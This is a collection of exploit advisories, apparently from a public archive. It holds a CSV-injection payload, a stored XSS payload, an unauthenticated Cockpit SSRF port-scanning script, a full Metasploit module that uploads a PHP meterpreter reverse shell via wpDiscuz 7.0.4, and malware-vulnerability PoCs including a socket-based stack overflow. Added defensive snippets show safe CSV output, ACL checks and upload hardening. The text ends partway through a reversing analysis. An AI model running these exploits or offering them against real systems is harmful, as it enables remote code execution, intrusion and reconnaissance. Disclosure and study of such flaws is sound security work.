
dnsrecon 0.10.0 CSV Injection


dnsrecon version 0.10.0 suffers from a CSV injection vulnerability.


MD5 | 4bce920f7493baa70e2b5037c9524863

# Exploit Title: dnsrecon 0.10.0 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-07
# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
# Version : 0.10.0
# Tested on: ParrotOS 4.10

dnsrecon, when scanning a TXT record such as SPF (e.g. _spf.domain.com), can write a CSV report (-c out.csv) with the columns Type,Name,Address,Target,Port and String.
A TXT record allows many characters, including single quotes and equals signs, so it is possible to break out of the CSV structure by creating a TXT record like the following:

_spf.example.com "test',=1+1337,'z"


user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
[*] Performing General Enumeration of Domain: _spf.example.com
[-] DNSSEC is not configured for _spf.example.com
[*] SOA ns-59.awsdns-07.com 205.1.1.1
[-] Could not Resolve NS Records for _spf.example.com
[-] Could not Resolve MX Records for _spf.example.com
[*] TXT _spf.example.com test',=1+1337,'z
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to CSV file: ./file.csv
{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}


This output is then written into a CSV with this structure (the commas inside the TXT string are not quoted, so they become extra columns and "=1+1337" lands in a cell of its own):

Type,Name,Address,Target,Port,String
SOA,ns-59.awsdns-07.com,205.1.1.1
TXT,_spf.example.com,,,,'test',=1+1337,'z'

The flexibility of TXT records allows many variants of formulas to be injected; from RFC 1464 (https://tools.ietf.org/html/rfc1464):

Attribute Values
All printable ASCII characters are permitted in the attribute value.
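The advisory shows the symptom (a TXT string spilling into extra CSV columns) but not the fix. The following is an added example, not dnsrecon's code, showing the unquoted comma-join that reproduces the broken layout next to a writer that quotes every cell and neutralizes cells that begin with a formula trigger. The sample records are constructed from the advisory's output; the third TXT record is a hypothetical one whose string itself starts with "=".

```python
import csv
import io

# Leading characters that make Excel and LibreOffice evaluate a cell as a formula
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# The six columns of the dnsrecon CSV report described above
COLUMNS = ["Type", "Name", "Address", "Target", "Port", "String"]


def record_to_row(rec: dict) -> list:
    """Map a dnsrecon-style record dict onto the six report columns."""
    return [
        str(rec.get("type", "")),
        str(rec.get("name", rec.get("mname", ""))),
        str(rec.get("address", "")),
        str(rec.get("target", "")),
        str(rec.get("port", "")),
        str(rec.get("strings", "")),
    ]


def naive_csv(records) -> str:
    """Comma-join the cells with no quoting: reproduces the broken layout in
    the advisory, where commas inside the TXT string create extra columns."""
    lines = [",".join(COLUMNS)]
    for rec in records:
        lines.append(",".join(record_to_row(rec)))
    return "\n".join(lines) + "\n"


def neutralize_cell(value: str) -> str:
    """Prefix a cell that starts with a formula trigger with a single quote so a
    spreadsheet treats it as text. The prefix is visible to other consumers."""
    if value and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def safe_csv(records) -> str:
    """Quote every cell (RFC 4180 style) and neutralize formula-leading cells."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(COLUMNS)
    for rec in records:
        writer.writerow([neutralize_cell(cell) for cell in record_to_row(rec)])
    return buf.getvalue()


def parse_rows(text: str) -> list:
    """Parse CSV text the way a spreadsheet import would split it."""
    return list(csv.reader(io.StringIO(text)))


# Constructed sample records modelled on the advisory's output; the third one is a
# hypothetical TXT record whose string itself starts with a formula trigger.
SAMPLE_RECORDS = [
    {"type": "SOA", "mname": "ns-59.awsdns-07.com", "address": "205.1.1.1"},
    {"type": "TXT", "name": "_spf.example.com", "strings": "test',=1+1337,'z"},
    {"type": "TXT", "name": "_spf.example.com", "strings": "=1+1337"},
]

if __name__ == "__main__":
    print(naive_csv(SAMPLE_RECORDS))
    print(safe_csv(SAMPLE_RECORDS))
```

Quoting alone is enough against the payload in the advisory, because the whole string then stays in one cell that begins with "t". The single-quote prefix covers a TXT string that begins with a trigger character, at the cost of altering the data, so a report that is consumed by scripts rather than spreadsheets may prefer quoting only.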




Online Doctor Appointment System 1.0 Cross Site Scripting


Online Doctor Appointment System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.


MD5 | 76c223f15acb1a444605758caefc7bb2

# Exploit Title: Online Doctor Appointment System  1.0 -  Multiple Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2021-01-08
# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1

Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php
Step 2: Click on the username and go to the profile page.
Step 3: Click on Update profile.
Step 4: Input "<script>alert("craniums")</script>" in the fields First Name, Last Name and Address.
Step 5: The payload then triggers each time you update the profile or visit a new page.

Backdoor.Win32.Agent.dcbh Insecure Permissions / Privilege Escalation


Backdoor.Win32.Agent.dcbh malware suffers from an insecure permissions vulnerability that can allow for privilege escalation.


MD5 | 79eaeea64233b9ed3ee2b637042313f9

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/bba63df41adcf2cf80c74e4a62539d44.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Agent.dcbh
Vulnerability: Insecure Permissions EoP
Description: Drops an executable with a randomly generated numeric name, e.g. 674_674.exe. Change (C) permission, which includes write, is granted to Authenticated Users, allowing privilege escalation.
Type: PE32
MD5: bba63df41adcf2cf80c74e4a62539d44
Vuln ID: MVID-2021-0016
Dropped files: Random numeric named .EXE under c:\ dir.
Disclosure: 01/08/2021

Exploit/Poc:
C:\>cacls C:\989_989.exe
C:\989_989.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Cockpit 234 Server-Side Request Forgery


Cockpit version 234 suffers from an unauthenticated server-side request forgery vulnerability.


MD5 | 08a5222d2042e7b178bdc08a8b512ecb

# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)
# Date: 08.01.2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://cockpit-project.org/
# Version: v234
# Tested on: Ubuntu 18.04

#!/usr/bin/python3
import argparse
import sys
import time
from argparse import ArgumentParser, Namespace

import requests
import urllib3
from bs4 import BeautifulSoup
from colorama import Fore, Style

"""
Example scanning for internal server:
python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23
Example scanning for loopback interface of server:
python3 PoC.py --target 192.168.1.33:9090
Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md
"""


def main():
    dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)"
    parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
    parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True)
    parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False)
    parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False)
    args: Namespace = parser.parse_args()

    target = args.target
    # Defaults: probe the Cockpit host's own loopback interface on the sshd port
    scan = args.scan if args.scan else "127.0.0.1"
    ports = args.ports if args.ports else "22"
    cockpitReq(target, scan, ports)


def cockpitReq(target, scan, ports):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    portRange = ports.split(",")
    for unsafe in portRange:
        headers = {
            "Host": str(target),
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            # "unsafe:inline" as bogus credentials: the login attempt is what makes
            # cockpit-ws open the ssh connection to the host named in the URL
            "Authorization": "Basic dW5zYWZlOmlubGluZQ==",
            "X-Authorize": "",
            "Connection": "close",
            "Cookie": "cockpit=deleted",
        }
        # The "cockpit+=<host>:<port>" path prefix selects the machine cockpit-ws
        # connects to over ssh before any authentication succeeds; that is the SSRF.
        # headers must be passed by keyword: the second positional argument of
        # requests.get() is params, so passing the dict positionally never sends it.
        req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login",
                           headers=headers, verify=False)
        time.sleep(2)
        soup = BeautifulSoup(req.text, "html.parser")
        responseCode = req.status_code
        title = soup.title.string if soup.title and soup.title.string else ""
        elapsed = req.elapsed.total_seconds()

        if responseCode == 404:
            print("Cockpit server was not found!")
        elif responseCode == 401:
            if title == "Authentication failed":
                # An SSH server answered and rejected the bogus credentials
                print(Fore.GREEN + Style.BRIGHT + "[+] Port: " + unsafe + " sshd service is detected!")
            elif title == "Authentication failed: no-host":
                # no-host after a long wait: something accepted the TCP connection but
                # did not speak SSH (open port); a fast no-host means the port is closed
                if elapsed > 10:
                    print(Fore.GREEN + Style.BRIGHT + "[-] Port: " + unsafe + " is open, sshd service is not detected!")
                else:
                    print(Fore.RED + Style.BRIGHT + "[-] Port: " + unsafe + " sshd service is not detected!")
            else:
                print(Fore.RED + Style.BRIGHT + "[-] An error occurred!")
                print("[-] One bad day!")
                sys.exit(1)
        else:
            print("Something went wrong!")


if __name__ == "__main__":
    main()

Backdoor.Win32.Xtreme.yvp Insecure Permissions / Privilege Escalation


Backdoor.Win32.Xtreme.yvp malware suffers from an insecure permissions vulnerability that can allow for privilege escalation.


MD5 | 741ddec159e373a1d7451f1e291cafb5

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/7bd93c10c9373cfc2bcc8eff712631f1.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Xtreme.yvp
Vulnerability: Insecure Permissions EoP
Description: Change (C) permission, which includes write, is granted to Authenticated Users on the dropped executable, allowing privilege escalation.
Type: PE32
MD5: 7bd93c10c9373cfc2bcc8eff712631f1
Vuln ID: MVID-2021-0017
Dropped files: System.exe
Disclosure: 01/08/2021

Exploit/PoC:
C:\>cacls C:\SystemG\System.exe
C:\SystemG\System.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
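Both Malvuln permission advisories above (MVID-2021-0016 and MVID-2021-0017) rest on the same cacls observation: an (ID)C entry for Authenticated Users on a dropped executable. The following is an added example, not Malvuln's code, that parses cacls output of that shape and flags write-capable entries held by principals outside an assumed trusted set. The sample output is constructed from the listing above, and the parser assumes the file path contains no spaces and that cacls is printing one entry per line (the "special access" multi-line form is not handled).

```python
import re

# cacls prints "<path> <principal>:(flags)<perm>" on its first line and one
# "<principal>:(flags)<perm>" per line after that. Flags such as (ID) mean the
# entry was inherited; the permission letter is F full, C change (read, write
# and delete), W write, R read, N none.
PATH_RE = re.compile(r"^[A-Za-z]:\\\S*\s+")  # assumes the path has no spaces
ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[FCRWN])$")
FLAG_RE = re.compile(r"\(([A-Z]+)\)")

WRITE_PERMS = {"F", "C", "W"}
# Principals that are expected to be able to modify files in system locations
TRUSTED_PRINCIPALS = {
    "BUILTIN\\Administrators",
    "NT AUTHORITY\\SYSTEM",
    "NT SERVICE\\TrustedInstaller",
}

# Constructed sample, modelled on the cacls output in the advisory above
SAMPLE_CACLS = """C:\\989_989.exe BUILTIN\\Administrators:(ID)F
                 NT AUTHORITY\\SYSTEM:(ID)F
                 BUILTIN\\Users:(ID)R
                 NT AUTHORITY\\Authenticated Users:(ID)C
"""


def parse_cacls(output: str) -> list:
    """Parse cacls output into (principal, flags, perm) tuples."""
    aces = []
    first = True
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        if first:
            # only the first entry carries the file path in front of it
            line = PATH_RE.sub("", line, count=1)
            first = False
        match = ACE_RE.match(line)
        if not match:
            raise ValueError(f"unparsed cacls line: {raw!r}")
        flags = tuple(FLAG_RE.findall(match["flags"]))
        aces.append((match["principal"], flags, match["perm"]))
    return aces


def writable_by_untrusted(aces: list) -> list:
    """Entries that let a principal outside the trusted set modify the file."""
    return [(principal, perm) for principal, flags, perm in aces
            if perm in WRITE_PERMS and principal not in TRUSTED_PRINCIPALS]


if __name__ == "__main__":
    for principal, perm in writable_by_untrusted(parse_cacls(SAMPLE_CACLS)):
        print(f"{principal} has {perm}")
```

On the sample this reports only the Authenticated Users entry: any logged-on user can replace the executable the malware later runs, which is the escalation the advisories describe.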



WordPress wpDiscuz 7.0.4 Shell Upload


This Metasploit module exploits an arbitrary file upload in the WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable server.


MD5 | 77c5903183e5519dfd6d1477ae0018a4

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress wpDiscuz Unauthenticated File Upload Vulnerability',
      'Description' => %q{
        This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
        version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files,
        including PHP files, and achieve remote code execution on a vulnerable site's server.
      },
      'Author' =>
        [
          'Chloe Chamberland', # Vulnerability Discovery, initial msf module
          'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['WPVDB', '10333'],
          ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
          ['URL', 'https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
          ['URL', 'https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
        ],
      'Privileged' => false,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['wpDiscuz < 7.0.5', {}]],
      'DisclosureDate' => 'Feb 21 2020',
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
        },
      'DefaultTarget' => 0))

    register_options [
      OptString.new('BLOGPATH', [true, 'Link to the post [/index.php/2020/12/12/post1]', nil]),
    ]
  end

  def check
    check_plugin_version_from_readme('wpdiscuz', '7.0.5')
  end

  def blogpath
    datastore['BLOGPATH']
  end

  # The wmuSecurity nonce embedded in the post page is the only token the upload
  # handler checks, and any visitor can read it from the page source
  def find_wmusecurity_id
    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath) }, 5)
    fail_with(Failure::Unknown, "#{peer} - Server did not answer") unless res
    match = res.body.match(/wmuSecurity":"(\w+)/)
    fail_with(Failure::NotFound, "#{peer} - wmuSecurity nonce not found on #{blogpath}") unless match
    match.captures
  end

  def exploit
    wmusecurity_id = find_wmusecurity_id[0]
    php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
    data = Rex::MIME::Message.new
    data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
    data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
    data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
    data.add_part('1', nil, nil, 'form-data; name="postId"')
    # A leading 'GIF8' satisfies the plugin's image check while the .php extension
    # is kept, so the stored file is executed as PHP when requested
    data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    fail_with(Failure::Unknown, "#{peer} - Server did not answer") unless res
    unless res.code == 200 && res.body =~ /#{php_page_name}/
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
    end
    print_good("Payload uploaded as #{php_page_name}")
    register_files_for_cleanup(php_page_name)

    # WordPress stores the upload under wp-content/uploads/<year>/<month>/ and appends
    # a numeric suffix, so recover the final name from the escaped URL in the JSON reply
    time = Time.new
    year = time.year.to_s
    month = "%02d" % time.month
    regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
    wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/', '')
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not find the stored file name in the reply") if wp_shell_upload.empty?

    print_status("Calling payload...")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, wp_shell_upload) },
      5
    )
  end
end
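The module above gets past the plugin's upload check with a 'GIF8' prefix on a file whose name still ends in .php. The following is an added example, not wpDiscuz's or the module authors' code, that puts that magic-bytes-only check next to an assumed hardened form: extension allowlist, a real header parse, agreement between the two, and a server-chosen storage name. The exploit stand-in and the minimal GIF are constructed for the example.

```python
import os
import struct

# Extensions a comment-attachment endpoint should accept (assumed allowlist)
ALLOWED_IMAGE_EXTENSIONS = {"gif", "png", "jpg", "jpeg"}

# Stand-in for the PHP meterpreter the module uploads: same 'GIF8' prefix,
# same .php filename, constructed for this example
EXPLOIT_FILENAME = "abcde.php"
EXPLOIT_CONTENT = b"GIF8" + b"<?php system($_GET['cmd']); ?>"

# A minimal but structurally valid GIF89a: header, 1x1 logical screen, trailer
MINIMAL_GIF = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00" + b";"


def weak_is_image(filename: str, content: bytes) -> bool:
    """Magic-bytes-only check of the kind the exploit defeats: a leading 'GIF8'
    is enough and the client-supplied .php extension is never examined."""
    return content.startswith(b"GIF8")


def sniff_image_type(content: bytes):
    """Return 'gif', 'png' or 'jpeg' only when the real header parses, else None."""
    if content[:6] in (b"GIF87a", b"GIF89a") and len(content) >= 13:
        width, height = struct.unpack("<HH", content[6:10])
        if width and height:
            return "gif"
    if content[:8] == b"\x89PNG\r\n\x1a\n" and content[12:16] == b"IHDR":
        return "png"
    if content[:3] == b"\xff\xd8\xff":
        return "jpeg"
    return None


def hardened_is_image(filename: str, content: bytes) -> bool:
    """Extension allowlist plus header parse, and the two must agree."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        return False
    kind = sniff_image_type(content)
    if kind is None:
        return False
    return ext == kind or (kind == "jpeg" and ext == "jpg")


def storage_name(content: bytes, random_token: str) -> str:
    """Server-chosen file name: the extension comes from the parsed header,
    never from the client, so a stored file can only carry an image extension."""
    kind = sniff_image_type(content)
    if kind is None:
        raise ValueError("content is not a recognised image")
    return random_token + "." + ("jpg" if kind == "jpeg" else kind)


if __name__ == "__main__":
    print("weak check accepts exploit:", weak_is_image(EXPLOIT_FILENAME, EXPLOIT_CONTENT))
    print("hardened check accepts exploit:", hardened_is_image(EXPLOIT_FILENAME, EXPLOIT_CONTENT))
    print("stored as:", storage_name(MINIMAL_GIF, "f3a9c1"))
```

A polyglot that is a valid GIF and also contains PHP still passes the content check; what keeps it harmless is the server-assigned .gif name together with an uploads directory that the web server does not execute PHP from.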


Backdoor.Win32.NinjaSpy.c Remote Stack Buffer Overflow


Backdoor.Win32.NinjaSpy.c suffers from a remote stack buffer overflow vulnerability. The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with large payloads of characters, we can cause a buffer overflow.


MD5 | 8f5ab251df42addd482e25bdea7aa8d8

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NinjaSpy.c
Vulnerability: Remote Stack Buffer Overflow
Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with large payloads of characters, we can cause a buffer overflow.

Type: PE32
MD5: 6eece319bc108576bd1f4a8364616264
Vuln ID: MVID-2021-0018
Dropped files: cmd.dll
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/08/2021

Memory Dump:
0:000> .ecxr
eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d
eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
cmd+0x40f57:
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0 ds:002b:414142c1=????????

FAULTING_IP:
cmd+40f57
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00440f57 (cmd+0x00040f57)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 414142c1
Attempt to read from address 414142c1

PROCESS_NAME: cmd.dll

OVERLAPPED_MODULE: Address regions for 'jscript9' and 'resourcepolicyclient.dll' overlap

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: 414142c1

READ_ADDRESS: 414142c1

FOLLOWUP_IP:
cmd+40f57
00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 000014f4

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 764ee0bb to 00440f57

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57
0019eb44 764f8849 03fe0e9d 00920602 00000046 user32!_InternalCallWinProc+0x2b
0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20
0019ec38 764e8503 03fe0e9d 00000000 00000046 user32!UserCallWinProcCheckWow+0x1be
0019eca0 764dfbfa 02c1f600 00000000 00000046 user32!DispatchClientMessage+0x1b3
0019ece8 773d0bcd 0019ed04 00000038 0019ee20 user32!__fnINOUTLPWINDOWPOS+0x4a
0019ed38 76832eec 76521878 000f0a14 76521760 ntdll!KiUserCallbackDispatcher+0x4d
0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc
0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118
0019ed88 764f8849 76521760 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019ee30 764dbf65 0055060a 00000110 000f0a14 user32!UserCallDlgProcCheckWow+0x10f
0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115
0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25
0019eed8 764f8849 764dbe20 0055060a 00000110 user32!_InternalCallWinProc+0x2b
0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
0019efcc 764fa89c 7a4afc30 00007ffe 00000110 user32!UserCallWinProcCheckWow+0x1be
0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff
0019f154 76506533 764d0000 0267a708 00000000 user32!InternalCreateDialog+0x1137
0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8
0019f264 768339ec 0019f3d0 76522093 0019f3e8 user32!SoftModalMessageBox+0x72b
0019f26c 76522093 0019f3e8 07c43d40 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc
0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a
0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743
0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a
0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f
0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446
0019fd94 764f8849 03fe0f05 005b0464 00000401 user32!_InternalCallWinProc+0x2b
0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20
0019fe88 764e90dc 03fe0f05 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c user32!DispatchMessageWorker+0x4ac
0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10
0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c
0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c
0019ff94 773c4a77 002d2000 8aaf072f 00000000 kernel32!BaseThreadInitThunk+0x24
0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f
0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: cmd+40f57

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: cmd

IMAGE_NAME: cmd.dll

DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19

FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown

BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57


Exploit/PoC:
from socket import *

MALWARE_HOST = "x.x.x.x"
PORT = 2004
c = 1
JUNK = "A" * 8601
AMT = 10
# Deliberately malformed PUT request: the oversized request line and the
# oversized Accept-Charset header are what overrun the stack buffer in cmd.dll
PAYLOAD = "PUT /" + JUNK + " HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n" + "Accept-Charset: " + JUNK


def doit():
    global c
    # The crash needs several consecutive requests, so send until AMT is reached
    while True:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST, PORT))
        s.send(PAYLOAD.encode())  # send bytes so this also runs under Python 3
        s.close()
        c += 1
        if c == AMT:
            print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow")
            print("MD5: 6eece319bc108576bd1f4a8364616264")
            print("By Malvuln")
            exit()


if __name__ == "__main__":
    doit()





Backdoor.Win32.Ketch.b Remote Stack Buffer Overflow


Backdoor.Win32.Ketch.b malware suffers from a remote stack buffer overflow vulnerability.


MD5 | 38df86e71109ce6870225d853970d548

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/9d7be3799594a82bf7056905f501af03.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Ketch.b
Vulnerability: Remote Stack Buffer Overflow

Description: Makes an HTTP GET request for a file "script.dat" and writes the server response to a temporary file named "watchb.tmp" under C:\Windows.
At 1032 bytes we overwrite the buffer, which is about 1000 bytes, and by sending 1,512 bytes we overwrite EIP. watchb.tmp holds the response from the server.

Type: PE32
MD5: 9d7be3799594a82bf7056905f501af03
Vuln ID: MVID-2021-0019
Dropped files: watchb.tmp
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/08/2021

C:\>type \Windows\watchb.tmp
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq...

The payload gets XOR'd, which complicates things: every byte of the response is XOR'd with 0x30, so "a" (0x61) becomes 0x51 "Q" and "A" (0x41) becomes 0x71 "q", and it is difficult to control the characters for our needs.
Therefore, if we want to see the typical 41414141 pattern overwriting EIP, we have to send the lowercase "q" character (0x71), which becomes 0x41 after the XOR with 0x30.

At offset 004014CE the routine that XORs our payload with 0x30 is called, and this has to be taken into account:
004014CE | E8 5D FF FF FF | call backdoor.win32.ketch.b

Reversing the code responsible for the payload character conversions, e.g. "a" to "Q" and "q" to "A", which challenge exploitation (debugger register values in parentheses):

movzx eax, al                        (al=BA)
push esi
mov esi, dword ptr ss:[esp+10]       (dword ptr [esp+10]=[0019E7F8]=0)
sub edx, esi
sub eax, esi
xor eax, edx                         (eax=BA, edx=BE)
    al of EAX is now 4 - EAX 00000004
    EDX = BABECAFE
mov edx, ecx
sar edx, 8
    EDX is now edx=FFBABECA
